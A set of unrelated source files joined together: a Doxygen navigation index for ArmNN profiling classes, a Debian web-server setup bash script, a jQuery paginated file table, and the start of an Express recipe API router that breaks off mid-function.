"classarmnn_1_1profiling_1_1_i_profiling_connection.xhtml#aacb6d0e5e6d570cdc2b0da14c3921ff0":[7,0,0,2,31,1],
"classarmnn_1_1profiling_1_1_i_profiling_connection.xhtml#ac78c6bd1a545934a805c88194214b09d":[7,0,0,2,31,4],
"classarmnn_1_1profiling_1_1_i_profiling_connection_factory.xhtml":[7,0,0,2,32],
"classarmnn_1_1profiling_1_1_i_profiling_connection_factory.xhtml#a0edc1350a5dcc81620a1f28e2a1051f2":[7,0,0,2,32,2],
"classarmnn_1_1profiling_1_1_i_profiling_connection_factory.xhtml#a18f247c2a53095da228e441270536b03":[7,0,0,2,32,3],
"classarmnn_1_1profiling_1_1_i_profiling_connection_factory.xhtml#a1e3ab71aae7621abd6c1a16cc71b68e0":[7,0,0,2,32,0],
"classarmnn_1_1profiling_1_1_i_profiling_connection_factory.xhtml#abb7f442bd7409c8dff2b9346fd67bce3":[7,0,0,2,32,1],
"classarmnn_1_1profiling_1_1_i_profiling_guid_generator.xhtml":[7,0,0,2,33],
"classarmnn_1_1profiling_1_1_i_profiling_guid_generator.xhtml#a46e22ba5f91b48d2b5165648787b9ace":[7,0,0,2,33,2],
"classarmnn_1_1profiling_1_1_i_profiling_guid_generator.xhtml#a9aff9f95b721c2dd1d229b9816261f1b":[7,0,0,2,33,1],
"classarmnn_1_1profiling_1_1_i_profiling_guid_generator.xhtml#ad19d8099ddbd9db86a34bdc756d110a8":[7,0,0,2,33,0],
"classarmnn_1_1profiling_1_1_i_profiling_service.xhtml":[7,0,0,2,34],
"classarmnn_1_1profiling_1_1_i_profiling_service.xhtml#a1d441898feff66d8ac30fa1724386869":[7,0,0,2,34,0],
"classarmnn_1_1profiling_1_1_i_profiling_service.xhtml#a33877b12b685ae752dc1227fe14d9441":[7,0,0,2,34,4],
"classarmnn_1_1profiling_1_1_i_profiling_service.xhtml#a743ad7374bfc124be30eebeb93206acd":[7,0,0,2,34,2],
"classarmnn_1_1profiling_1_1_i_profiling_service.xhtml#a93ee1c2509b9db845936a291b575dd17":[7,0,0,2,34,5],
"classarmnn_1_1profiling_1_1_i_profiling_service.xhtml#ac4e831d7fe03198d15e7212c7d40c96c":[7,0,0,2,34,1],
"classarmnn_1_1profiling_1_1_i_profiling_service.xhtml#af39c79e2dbf841cf43cfcf1e5f2a30cb":[7,0,0,2,34,3],
"classarmnn_1_1profiling_1_1_i_read_counter_values.xhtml":[7,0,0,2,35],
"classarmnn_1_1profiling_1_1_i_read_counter_values.xhtml#a0ac59f90f7593e43d1d7939d2ca11a4c":[7,0,0,2,35,0],
"classarmnn_1_1profiling_1_1_i_read_counter_values.xhtml#a0e2c96a05cefc72d60f5a35692a4a928":[7,0,0,2,35,3],
"classarmnn_1_1profiling_1_1_i_read_counter_values.xhtml#acab78d0987a9cca5a9cac957be610a7d":[7,0,0,2,35,1],
"classarmnn_1_1profiling_1_1_i_read_counter_values.xhtml#af0092bd7f4da4a071b29bc04aec883cd":[7,0,0,2,35,2],
"classarmnn_1_1profiling_1_1_i_read_only_packet_buffer.xhtml":[7,0,0,2,36],
"classarmnn_1_1profiling_1_1_i_read_only_packet_buffer.xhtml#a040a515076ec53aa5e3a933d7c7ce43c":[7,0,0,2,36,0],
"classarmnn_1_1profiling_1_1_i_read_only_packet_buffer.xhtml#a43a27876dafdccf067777f84a97e6664":[7,0,0,2,36,1],
"classarmnn_1_1profiling_1_1_i_read_only_packet_buffer.xhtml#a60eae84cd5c7f05de36f64c1fdc0001c":[7,0,0,2,36,2],
"classarmnn_1_1profiling_1_1_i_read_only_packet_buffer.xhtml#adf275dd5054ae4d71e736ba427e1d200":[7,0,0,2,36,3],
"classarmnn_1_1profiling_1_1_i_read_write_counter_values.xhtml":[7,0,0,2,37],
"classarmnn_1_1profiling_1_1_i_read_write_counter_values.xhtml#a793b09867c400487ca81505aa8ebd6cc":[7,0,0,2,37,0],
"classarmnn_1_1profiling_1_1_i_register_backend_counters.xhtml":[7,0,0,2,38],
"classarmnn_1_1profiling_1_1_i_register_backend_counters.xhtml#a1df38f206d3d114ab5c98624a74595e7":[7,0,0,2,38,0],
"classarmnn_1_1profiling_1_1_i_register_backend_counters.xhtml#a1e48221e1b2a005b133f0043c8ed7190":[7,0,0,2,38,4],
"classarmnn_1_1profiling_1_1_i_register_backend_counters.xhtml#a745a18d2d50f88ae616af5e3fe67892f":[7,0,0,2,38,1],
"classarmnn_1_1profiling_1_1_i_register_backend_counters.xhtml#a9bd077ffa9adfaedd89b83505a1da115":[7,0,0,2,38,2],
"classarmnn_1_1profiling_1_1_i_register_backend_counters.xhtml#a9c9fb969e907ab6e67d5b605ff019489":[7,0,0,2,38,3],
"classarmnn_1_1profiling_1_1_i_register_counter_mapping.xhtml":[7,0,0,2,39],
"classarmnn_1_1profiling_1_1_i_register_counter_mapping.xhtml#a43a787400d2a563b9eee1a149225c18a":[7,0,0,2,39,2],
"classarmnn_1_1profiling_1_1_i_register_counter_mapping.xhtml#a9cd06e75fb10218f2decbd4117af4a8e":[7,0,0,2,39,0],
"classarmnn_1_1profiling_1_1_i_register_counter_mapping.xhtml#ae8ae959752e05d110a66f590dfb18faa":[7,0,0,2,39,1],
"classarmnn_1_1profiling_1_1_i_send_counter_packet.xhtml":[7,0,0,2,40],
"classarmnn_1_1profiling_1_1_i_send_counter_packet.xhtml#a14e9efe48e3d4ed05396f8a856bfaeea":[7,0,0,2,40,5],
"classarmnn_1_1profiling_1_1_i_send_counter_packet.xhtml#a583357d6511e6cb6084829e4f7cd1315":[7,0,0,2,40,1],
"classarmnn_1_1profiling_1_1_i_send_counter_packet.xhtml#a6435f063192414c6dc68ef2f31628a5c":[7,0,0,2,40,4],
"classarmnn_1_1profiling_1_1_i_send_counter_packet.xhtml#a80cb41c63cb6d3a19870b3a0a8f21ba7":[7,0,0,2,40,0],
"classarmnn_1_1profiling_1_1_i_send_counter_packet.xhtml#ae3331355e62b6008340c27e82be9a851":[7,0,0,2,40,2],
"classarmnn_1_1profiling_1_1_i_send_counter_packet.xhtml#aeacf0722dbf513d511b46a9bf43bfa4a":[7,0,0,2,40,3],
"classarmnn_1_1profiling_1_1_i_send_thread.xhtml":[7,0,0,2,41],
"classarmnn_1_1profiling_1_1_i_send_thread.xhtml#a4e0fb8f587a0f5ef84d28e57cd2b6afe":[7,0,0,2,41,0],
"classarmnn_1_1profiling_1_1_i_send_thread.xhtml#a7c6c2c7d1aeec305dcae4bc901b0bdca":[7,0,0,2,41,2],
"classarmnn_1_1profiling_1_1_i_send_thread.xhtml#ae9429e2efd9a811c148c6b56b635567c":[7,0,0,2,41,1],
"classarmnn_1_1profiling_1_1_i_send_timeline_packet.xhtml":[7,0,0,2,42],
"classarmnn_1_1profiling_1_1_i_send_timeline_packet.xhtml#a0426a9f8bc2789012477f08c3e03a532":[7,0,0,2,42,5],
"classarmnn_1_1profiling_1_1_i_send_timeline_packet.xhtml#a4025973da19ce55930abfd8b6df4edbe":[7,0,0,2,42,6],
"classarmnn_1_1profiling_1_1_i_send_timeline_packet.xhtml#a86e61b430276d7fe2861e2b3ac30221c":[7,0,0,2,42,0],
"classarmnn_1_1profiling_1_1_i_send_timeline_packet.xhtml#ae487fd34b2cf1fd88381da8fcb8c0984":[7,0,0,2,42,4],
"classarmnn_1_1profiling_1_1_i_send_timeline_packet.xhtml#af7eb3c2db53d7cba441b9a8d3a7bede9":[7,0,0,2,42,2],
"classarmnn_1_1profiling_1_1_i_send_timeline_packet.xhtml#af989a156fe1339215ecb6667fce1b9de":[7,0,0,2,42,3],
"classarmnn_1_1profiling_1_1_i_send_timeline_packet.xhtml#afa8522a76e7102e41d7c73a34fe493d4":[7,0,0,2,42,1],
"classarmnn_1_1profiling_1_1_i_send_timeline_packet.xhtml#affa63e0fcb0702b52815e840d7813803":[7,0,0,2,42,7],
"classarmnn_1_1profiling_1_1_i_write_counter_values.xhtml":[7,0,0,2,43],
"classarmnn_1_1profiling_1_1_i_write_counter_values.xhtml#a1a7730e559150a572dc27b05c96d98b9":[7,0,0,2,43,4],
"classarmnn_1_1profiling_1_1_i_write_counter_values.xhtml#a4ba4a09617cccdeabacf0efafcc8f4b9":[7,0,0,2,43,3],
"classarmnn_1_1profiling_1_1_i_write_counter_values.xhtml#a4bea6d881d0a2c0ebf8779bce4050352":[7,0,0,2,43,1],
"classarmnn_1_1profiling_1_1_i_write_counter_values.xhtml#a78f2b663eb502e4849edfb4bdfda71bb":[7,0,0,2,43,2],
"classarmnn_1_1profiling_1_1_i_write_counter_values.xhtml#ae66105a7872a56f4f98e700d673bfd8b":[7,0,0,2,43,0],
"classarmnn_1_1profiling_1_1_labels_and_event_classes.xhtml":[7,0,0,2,44],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml":[7,0,0,2,46],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml#a183eaa37ccd326bd82179bed901c7122":[7,0,0,2,46,2],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml#a226108649851aa1b1a8168560c5228b5":[7,0,0,2,46,6],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml#abce8709dc1b666a26f427ba7ff08b737":[7,0,0,2,46,4],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml#ac29af30972ae62351f87a669e2c8940f":[7,0,0,2,46,0],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml#ac3f43b4dd3fafd6b13342acc2263bbb4":[7,0,0,2,46,7],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml#ad675ff4e9053375bd41d0aad6b3bbb63":[7,0,0,2,46,8],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml#ae717263b3243e9f88f4caea6d31b0652":[7,0,0,2,46,5],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml#ae8b885e4225f3b0976f22ae8bc94f52a":[7,0,0,2,46,1],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml#af22fdc7450c285c4d7449425c8fe994f":[7,0,0,2,46,3],
"classarmnn_1_1profiling_1_1_mock_counter_directory.xhtml":[7,0,0,2,47],
"classarmnn_1_1profiling_1_1_mock_counter_directory.xhtml#a130d8f6cbda6d299aeb355d4abcc5f95":[7,0,0,2,47,15],
"classarmnn_1_1profiling_1_1_mock_counter_directory.xhtml#a180f0ad0d134cd8ea5eb89c663ae00b0":[7,0,0,2,47,1]
};
|
#!/bin/bash
VERSION="0.1"
AUTHOR="Matteo Mattei <info@matteomattei.com>"
is_installed()
{
	# Exit status 0 iff dpkg knows about package "$1".
	# A function's return value is the status of its last command, so no
	# explicit `return ${?}` is required.
	dpkg -l "$1" &> /dev/null
}
pretty_echo()
{
	# Print the given message in bold green, then reset terminal attributes.
	local message="${1}"
	echo -e "\e[1;32m${message}\e[0m"
}
select_yes()
{
	# Ask a yes/no question and loop until a recognisable answer is given.
	# Empty input (just Enter) defaults to yes.
	# Returns 0 for yes, 1 for no.
	#
	# Fix: the negative branch previously matched only n|N|no|NO, so "No"
	# and "nO" fell through to "I don't understand" — inconsistent with the
	# positive branch, which accepts yes|Yes|YES. All casings of "no" are
	# now accepted.
	MESSAGE="${1}"
	while true; do
		pretty_echo "\n${MESSAGE} [Y|n]"
		read RES
		case "${RES}" in
			y|Y|yes|Yes|YES|"")
				return 0
				;;
			n|N|no|No|nO|NO)
				return 1
				;;
			*)
				pretty_echo "I don't understand..."
				;;
		esac
	done
}
##############################
###### MAIN STARTS HERE ######
##############################
# Make sure to be root
if [ ! $(id -u) -eq 0 ]; then pretty_echo "You have to execute this program with root credentials"; exit 1; fi
# PRINT STARTUP MESSAGE
COPYRIGHT_DATE=$(date +%Y)
[ ${COPYRIGHT_DATE} -gt 2014 ] && COPYRIGHT_DATE="2014-${COPYRIGHT_DATE}"
pretty_echo "
DebianServerSetup v.${VERSION} - copyright ${COPYRIGHT_DATE} ${AUTHOR}
This program will updated the whole system and install a set of common services
needed for a production Web Server based on Debian based distribution.
This is the list of the services supported:
1) MySQL (database server)
2) NGINX (reverse proxy web server)
3) APACHE (web server)
3) PHP (web backend)
4) EXIM (MTA mail server)
5) SHOREWALL (firewall)
During the installation you will be prompted to insert the following information:
HOSTNAME: hostname of the server (\"web1\" for example)
FQDN: a Fully Qualified Domain Name (\"web1.mydomain.com\" for example)
IP_ADDRESS: a public IP address
MYSQL ROOT PASSWORD: only if you decide to install MySQL
-----------------------------------------------------------------------------------------"
if ! select_yes "Do you want to proceed?"; then exit 0; fi
# SETUP APT SOURCE
# This is just for clean-up in case some server has an old repository configured
sed -i "/non\-us\.debian\.org/d" /etc/apt/sources.list
# Make sure to use wheezy repository
sed -i "{s#squeeze.*#wheezy/updates main contrib non-free#g}" /etc/apt/sources.list
# SETTING UP LOCALES
# This is needed in case the server does not have any locale already configured
if [ -z "${LC_ALL}" ] || [ -z "${LANGUAGE}" ] || [ -z "${LANG}" ]
then
export LC_ALL="en_US.UTF-8"
export LANGUAGE="en_US.UTF-8"
export LANG="en_US.UTF-8"
sed -i "{s/^# en_US\.UTF\-8 UTF\-8/en_US.UTF-8 UTF-8/g}" /etc/locale.gen
update-locale LC_ALL=en_US.UTF-8
update-locale LANGUAGE=en_US.UTF-8
update-locale LANG=en_US.UTF-8
locale-gen en_US.UTF-8
. /etc/default/locale
fi
# UPDATE THE WHOLE SYSTEM
export DEBIAN_FRONTEND=noninteractive
apt-get update
apt-get -y upgrade
apt-get -y dist-upgrade
# INSTALL USEFUL TOOLS
apt-get -y install vim git pwgen
# SETUP IP ADDRESS AND HOSTNAME
IP_ADDRESS=$(ifconfig | grep "inet addr:" | grep -v "127\.0\.0\.1" | awk '{print $2}' | awk -F':' '{print $2}')
if [ -n "${IP_ADDRESS}" ]
then
if ! select_yes "Do you want to use the IP address ${IP_ADDRESS}?"
then
while true
do
pretty_echo "Plesae provide your IP address"
read IP_ADDRESS
if [ -n "${IP_ADDRESS}" ]
then
if echo "${IP_ADDRESS}" | grep -Eq "^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$"
then
break
else
pretty_echo "Unknown IP address"
fi
fi
done
fi
else
while true
do
pretty_echo "Plesae provide your IP address"
read IP_ADDRESS
if [ -n "${IP_ADDRESS}" ]
then
if echo "${IP_ADDRESS}" | grep -Eq "^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$"
then
break
else
pretty_echo "Unknown IP address"
fi
fi
done
fi
# Now that we have the IP address we setup /etc/hosts
while true
do
pretty_echo "Current hostname: $(hostname)"
pretty_echo "Current FQDN: $(hostname -f)"
if select_yes "Do you want to change them?"
then
while true
do
pretty_echo "Please provide a new hostname (something like 'web1')"
read HOSTNAME_NAME
if [ -n "${HOSTNAME_NAME}" ]
then
echo "${HOSTNAME_NAME}" > /etc/hostname
break
fi
done
while true
do
pretty_echo "Please provide a new FQDN (something like 'web1.mydomain.tld')"
read HOSTNAME_FQDN
if [ -n "${HOSTNAME_FQDN}" ]
then
break
fi
done
# remove all lines with localhost and the public IP from /etc/hosts
sed -i "/^${IP_ADDRESS}.*/d" /etc/hosts
sed -i "/^127\.0\..*/d" /etc/hosts
# Insert the correct values in the top of the /etc/hosts
sed -i "1i ${IP_ADDRESS} ${HOSTNAME_FQDN} ${HOSTNAME_NAME}" /etc/hosts
sed -i "1i 127.0.0.1 localhost.localdomain localhost" /etc/hosts
# Set up hostname
echo "${HOSTNAME_NAME}" > /etc/hostname
hostname -F /etc/hostname
else
break
fi
done
# MYSQL
if select_yes "Do you want to install MySQL server and client?"
then
# MYSQL-SERVER
if ! $(is_installed mysql-server)
then
while true
do
pretty_echo "Please provide a MySQL root password"
read MYSQL_ROOT_PASSWORD
if [ -z "${MYSQL_ROOT_PASSWORD}" ]
then
pretty_echo "Password cannot be empty!"
continue
fi
pretty_echo "Please type the MySQL root password again"
read MYSQL_ROOT_PASSWORD_2
if [ ! "${MYSQL_ROOT_PASSWORD}" = "${MYSQL_ROOT_PASSWORD_2}" ]
then
pretty_echo "The two entered passwords do not match"
continue
else
break
fi
done
echo "mysql-server mysql-server/root_password password ${MYSQL_ROOT_PASSWORD}" | debconf-set-selections
echo "mysql-server mysql-server/root_password_again password ${MYSQL_ROOT_PASSWORD}" | debconf-set-selections
apt-get -y install mysql-server
# Configure MYSQL
sed -i "{s/^key_buffer\s/key_buffer_size/g}" /etc/mysql/my.cnf
sed -i "{s/^myisam-recover\s/myisam-recover-options/g}" /etc/mysql/my.cnf
else
pretty_echo "MYSQL server already installed... nothing done"
fi
# MYSQL-CLIENT
if ! $(is_installed mysql-client)
then
apt-get -y install mysql-client
else
pretty_echo "MYSQL client already installed... nothing done"
fi
fi
# NGINX
# Optionally install nginx and apply basic production hardening to
# /etc/nginx/nginx.conf (gzip, hidden version string, worker sizing).
if select_yes "Do you want to install NGINX reverse proxy web server?"
then
# NOTE(review): `if ! $(is_installed nginx)` executes the substitution's
# output as the tested command; it only works because is_installed prints
# nothing. Plain `if ! is_installed nginx` would be conventional — confirm
# before changing, the pattern is used consistently in this script.
if ! $(is_installed nginx)
then
apt-get -y install nginx
# Configure NGINX for production
# Count logical CPUs so worker_processes can match the core count.
CPU_CORES=`grep "^processor" /proc/cpuinfo | wc -l`
# Enable gzip by uncommenting the shipped defaults.
sed -i "{s/# gzip on;/gzip on;/g}" /etc/nginx/nginx.conf
sed -i "{s/# gzip_/gzip_/g}" /etc/nginx/nginx.conf
# Hide the nginx version string in responses and error pages.
sed -i "{s/# server_tokens off;/server_tokens off;/g}" /etc/nginx/nginx.conf
# Also compress SVG images (append to the gzip_types list).
sed -i "/gzip_types/s/;/ image\/svg+xml;/" /etc/nginx/nginx.conf
# One worker per core, 1024 connections per worker.
sed -i "{s/^worker_processes.*/worker_processes ${CPU_CORES};/g}" /etc/nginx/nginx.conf
sed -i "{s/worker_connections.*/worker_connections 1024;/g}" /etc/nginx/nginx.conf
else
pretty_echo "NGINX already installed... nothing done"
fi
fi
# APACHE
# Optionally install Apache bound to loopback:8080 so it can sit behind the
# nginx reverse proxy configured above.
if select_yes "Do you want to install APACHE web server?"
then
if ! $(is_installed apache2)
then
apt-get -y install apache2 libapache2-mod-fastcgi apache2-mpm-worker
# Configure APACHE for production
# Listen only on 127.0.0.1:8080 — never exposed directly to the network.
sed -i "{s/^NameVirtualHost.*/NameVirtualHost 127.0.0.1:8080/g}" /etc/apache2/ports.conf
sed -i "{s/^Listen.*/Listen 127.0.0.1:8080/g}" /etc/apache2/ports.conf
sed -i "{s/<VirtualHost.*/<VirtualHost 127.0.0.1:8080>/g}" /etc/apache2/sites-available/default
# Apache modules
# Enable FastCGI plus common helper modules (rewrite etc.).
a2enmod fastcgi actions alias rewrite
else
pretty_echo "APACHE already installed... nothing done"
fi
fi
# PHP-FPM
# Optionally install PHP 5 with FPM; when MySQL is present, also offer the
# php5-mysql bindings and a debconf-preseeded phpMyAdmin install.
if select_yes "Do you want to install PHP-FPM?"
then
if ! $(is_installed php5-fpm)
then
apt-get -y install php5 php5-fpm php5-mcrypt
# Configure PHP-FPM
# Close the classic nginx+PHP path-guessing hole: never "fix" PATH_INFO.
sed -i "{s/^;cgi\.fix_pathinfo=1/cgi.fix_pathinfo=0/g}" /etc/php5/fpm/php.ini
# Kill requests stuck for longer than 10 minutes.
sed -i -e 's|^;*request_terminate_timeout.*|request_terminate_timeout = 600|' /etc/php5/fpm/pool.d/www.conf
# Recycle each worker after 500 requests to bound slow memory leaks.
sed -i "{s/;pm.max_requests =.*/pm.max_requests = 500/g}" /etc/php5/fpm/pool.d/www.conf
# PHP-MYSQL
if $(is_installed mysql-server)
then
if ! $(is_installed php5-mysql)
then
apt-get -y install php5-mysql
fi
# PHPMYADMIN
# Preseed debconf so the phpmyadmin install runs non-interactively.
# NOTE(review): assumes MYSQL_ROOT_PASSWORD was set earlier in this script's
# MySQL step — it is empty when MySQL was already installed before this run.
if select_yes "Do you want to install PHPMYADMIN"
then
if ! $(is_installed phpmyadmin)
then
# Random 20-character password for phpmyadmin's own database user.
AUTOGENERATED_PASS=`pwgen -c -1 20`
echo "phpmyadmin phpmyadmin/reconfigure-webserver multiselect apache2" | debconf-set-selections
echo "phpmyadmin phpmyadmin/dbconfig-install boolean true" | debconf-set-selections
echo "phpmyadmin phpmyadmin/mysql/admin-user string root" | debconf-set-selections
echo "phpmyadmin phpmyadmin/mysql/admin-pass password ${MYSQL_ROOT_PASSWORD}" | debconf-set-selections
echo "phpmyadmin phpmyadmin/mysql/app-pass password ${AUTOGENERATED_PASS}" |debconf-set-selections
echo "phpmyadmin phpmyadmin/app-password-confirm password ${AUTOGENERATED_PASS}" | debconf-set-selections
apt-get -y install phpmyadmin
fi
fi
fi
fi
fi
# EXIM
# Optionally install the Exim MTA and configure it as an internet site.
if select_yes "Do you want to install Exim mail server?"
then
if ! $(is_installed exim4)
then
apt-get -y install exim4
fi
# Clean mail queue
# Drop any messages queued during installation.
[ -n "$(mailq)" ] && rm -f /var/spool/exim4/input/*
# Configuration
# NOTE(review): relies on HOSTNAME_FQDN / HOSTNAME_NAME being set earlier
# in this script (outside this excerpt).
sed -i "{s/^dc_eximconfig_configtype=.*/dc_eximconfig_configtype='internet'/g}" /etc/exim4/update-exim4.conf.conf
sed -i "{s/^dc_other_hostnames=.*/dc_other_hostnames='${HOSTNAME_FQDN}; ${HOSTNAME_NAME}; localhost.localdomain; localhost'/g}" /etc/exim4/update-exim4.conf.conf
echo "${HOSTNAME_FQDN}" > /etc/mailname
fi
# SHOREWALL
# Optionally install the Shorewall firewall seeded from the one-interface
# sample config, then open ports for whichever services got installed.
if select_yes "Do you want to install Shorewall firewall?"
then
if ! $(is_installed shorewall)
then
apt-get -y install shorewall
fi
# Configuration
# Allow the init script to actually start the firewall.
sed -i "{s/^startup=0$/startup=1/g}" /etc/default/shorewall
cp /usr/share/doc/shorewall/examples/one-interface/interfaces /etc/shorewall/interfaces
cp /usr/share/doc/shorewall/examples/one-interface/policy /etc/shorewall/policy
cp /usr/share/doc/shorewall/examples/one-interface/rules /etc/shorewall/rules
cp /usr/share/doc/shorewall/examples/one-interface/zones /etc/shorewall/zones
echo -e "\n# Custom rules\n" >> /etc/shorewall/rules
# Open inbound ports only for services that are actually installed.
if $(is_installed nginx); then
echo "HTTP/ACCEPT net \$FW" >> /etc/shorewall/rules
fi
if $(is_installed openssh-server); then
echo "SSH/ACCEPT net \$FW" >> /etc/shorewall/rules
fi
# NOTE(review): 'vsftp' looks like a typo for the 'vsftpd' package — if so,
# the FTP rule is never added; confirm the intended package name.
if $(is_installed vsftp); then
echo "FTP/ACCEPT net \$FW" >> /etc/shorewall/rules
fi
fi
# SSH KEY
# Optionally append a user-supplied public key to root's authorized_keys.
if select_yes "Do you want to add a public key for SSH access?"
then
while true
do
pretty_echo "Please paste your public key here:"
read PUBKEY
if [ -n "${PUBKEY}" ]
then
mkdir -p /root/.ssh/
echo "${PUBKEY}" >> /root/.ssh/authorized_keys
# BUG FIX: with StrictModes (the sshd default) OpenSSH refuses keys whose
# files are group-accessible; the previous 660/770 modes silently broke
# key-based login. authorized_keys must be 600 and ~/.ssh must be 700.
chmod 600 /root/.ssh/authorized_keys
chmod 700 /root/.ssh
break
else
pretty_echo "Please specify a key"
fi
done
fi
# DOWNLOAD MANAGEMENT TOOLS
# Fetch the per-domain management helpers next to this script.
# NOTE(review): downloads are over HTTPS but not checksummed/signed.
wget -q https://raw.githubusercontent.com/matteomattei/servermaintenance/master/Debian7/add_domain.sh && chmod 750 add_domain.sh
wget -q https://raw.githubusercontent.com/matteomattei/servermaintenance/master/Debian7/del_domain.sh && chmod 750 del_domain.sh
# RESTART SERVICES
# Restart only the services that were actually installed above.
pretty_echo "Restarting all services..."
if $(is_installed mysql-server); then
service mysql restart
fi
if $(is_installed php5-fpm); then
service php5-fpm restart
fi
if $(is_installed apache2); then
service apache2 restart
fi
if $(is_installed nginx); then
service nginx restart
fi
if $(is_installed exim4); then
service exim4 restart
fi
if $(is_installed shorewall); then
service shorewall restart
fi
# Offer a reboot so kernel/host-level changes take effect.
pretty_echo "Installation complete. You should restart the server now"
if select_yes "Do you want to restart the server now?"
then
reboot
fi
exit 0
|
;
var index_info_ops = {
    // Rows rendered per page.
    page_size: 10,
    // File list fetched from /api/file/obtain.
    // BUG FIX: initialized to an array (the original used {}, whose .length
    // is undefined) so pageChange/createTableHtml are safe before the first
    // AJAX response arrives.
    data: [],
    init: function () {
        this.eventBind();
        // Wire the page bar; Pagination invokes pageChange on page clicks.
        Pagination.init($("#pageBar"), index_info_ops.pageChange);
    },
    click_delete: function (a) {
        console.log(a);
    },
    pageChange: function (i) {
        index_info_ops.createTableHtml(i);
        Pagination.Page($(".ht-page"), i, index_info_ops.data.length, index_info_ops.page_size);
    },
    // Escape untrusted server-provided text before splicing it into HTML so
    // a crafted file name/path cannot inject markup (XSS).
    escapeHtml: function (value) {
        return String(value)
            .replace(/&/g, '&amp;')
            .replace(/</g, '&lt;')
            .replace(/>/g, '&gt;')
            .replace(/"/g, '&quot;');
    },
    // Render one page of the file table into #table.
    // `page` is the starting row index handed over by the pagination plugin.
    createTableHtml: function (page) {
        var htmls = "";
        // BUG FIX: the original tested `data.length < 0`, which can never be
        // true; bail out when there is genuinely nothing to render.
        if (index_info_ops.data.length === 0) {
            return;
        }
        htmls += '<div class="col-lg-12">';
        htmls += '<table class="table table-bordered m-t">';
        htmls += '<thead>';
        htmls += '<tr>';
        htmls += '<th>序号</th>';
        htmls += '<th>id</th>';
        htmls += '<th>文件名</th>';
        htmls += '<th>地址</th>';
        htmls += '<th>短连接</th>';
        htmls += '<th>上传时间</th>';
        htmls += '<th>删除</th>';
        htmls += '</tr>';
        htmls += '</thead>';
        htmls += '<tbody>';
        for (var i = page; (i < (page + index_info_ops.page_size) && (i < index_info_ops.data.length)); i++) {
            var item = index_info_ops.data[i];
            // NOTE(review): every row reuses id="file_delete" — duplicate DOM
            // ids are invalid HTML. The delegated click handler still works,
            // but the id is kept so the existing "#file_delete" selector in
            // the ready-handler keeps matching.
            htmls += '<tr>' +
                '<td>' + i + '</td>' +
                '<td>' + index_info_ops.escapeHtml(item["id"]) + '</td>' +
                '<td>' + index_info_ops.escapeHtml(item["name"]) + '</td>' +
                '<td>' + index_info_ops.escapeHtml(item["path"]) + '</td>' +
                '<td>' + index_info_ops.escapeHtml(item["shortPath"]) + '</td>' +
                '<td>' + index_info_ops.escapeHtml(item["createAt"]) + '</td>' +
                '<td>' +
                '<a class="m-l remove" href="javascript:void(0);" >' +
                '<i class="fa fa-trash fa-lg" id="file_delete" attach="' + index_info_ops.escapeHtml(item["id"]) + '"></i>' +
                '</a>' +
                '</td>' +
                '</tr>';
        }
        htmls += '</tbody>';
        htmls += '</table>';
        htmls += '</div>';
        $("#table").html(htmls);
    },
    // Fetch the full file list and render the first page.
    eventBind: function () {
        $("#table").html("init ...");
        $.ajax({
            url: '/api/file/obtain',
            headers: {'Content-Type': 'application/json'},
            contentType: 'application/json;charset=UTF-8',
            type: 'GET',
            dataType: 'json',
            success: function (res) {
                if (res['code'] == 1) {
                    if (res['result'].length == 0) {
                        $("#table").html("没有视频");
                    } else {
                        index_info_ops.data = res['result'];
                        // Render page 0 and initialize the pagination widget.
                        index_info_ops.createTableHtml(0);
                        Pagination.Page($("#pageBar"), 0, res['result'].length, index_info_ops.page_size);
                    }
                } else {
                    if (res['code'] == 7777) {
                        // Session expired — force re-login.
                        common_ops.alert("请重新登录", function () {
                            window.location.href = "/login.html";
                        });
                    } else {
                        $("#table").html(res['msg']);
                    }
                }
            }
        })
    }
};
$(document).ready(function () {
// Boot the table, then wire the delete handler.
index_info_ops.init();
// Delegated handler: table rows are re-rendered on every page change, so
// bind on document rather than on the (transient) trash icons themselves.
$(document).on("click", "#file_delete", function () {
var id = $(this).attr("attach");
// Ask the user to confirm before deleting.
common_ops.alert("确定删除?", function () {
$.ajax({
// NOTE(review): the delete endpoint is invoked with GET — confirm the
// server really routes deletes this way (DELETE/POST would be typical).
url: '/api/file/delete/' + id,
headers: {'Content-Type': 'application/json'},
contentType: 'application/json;charset=UTF-8',
type: "GET",
dataType: 'json',
success: function (res) {
if (res['code'] == 1) {
// Refresh the file list view after a successful delete.
common_ops.alert("删除成功", function () {
index_nav_ops.info();
});
} else {
if (res['code'] == 7777) {
// Session expired — force re-login.
common_ops.alert("请重新登录", function () {
window.location.href = "/login.html";
});
} else {
common_ops.alert(res.msg, function () {
});
}
}
},
error: function (e) {
console.log(e)
}
});
});
});
});
// eventDeleteBind = function (id) {
// console.log("被点击了:" + id);
// $.ajax({
// url: '/api/file/delete/' + id,
// headers: {'Content-Type': 'application/json'},
// contentType: 'application/json;charset=UTF-8',
// type: JSON.stringify({'id': id}),
// dataType: 'json',
// success: function (res) {
// if (res['code'] == 1) {
// common_ops.alert("删除成功", function () {
// window.location.href = "/";
// });
// } else {
// if (res['code'] == 7777) {
// common_ops.alert("请重新登录", function () {
// window.location.href = "/login.html";
// });
// } else {
// common_ops.alert(res.msg, function () {
// });
// }
// }
// }
// });
// }; |
<gh_stars>0
const router = require('express').Router()
const {Recipe, Cuisine, Course} = require('../../db/models')
module.exports = router
// GET / — return every recipe as JSON.
router.get('/', async (req, res, next) => {
    try {
        const recipes = await Recipe.findAll()
        res.json(recipes)
    } catch (error) {
        // BUG FIX: the original only logged the error, leaving the client
        // request hanging with no response; delegate to the Express error
        // middleware instead.
        next(error)
    }
})
// GET /:recipeId — return one recipe (with its cuisines and courses),
// or 404 when the id does not exist. (Debug console.log calls removed.)
router.get('/:recipeId', async (req, res, next) => {
    try {
        const recipe = await Recipe.findByPk(req.params.recipeId, {
            include: [Cuisine, Course]
        })
        if (recipe) {
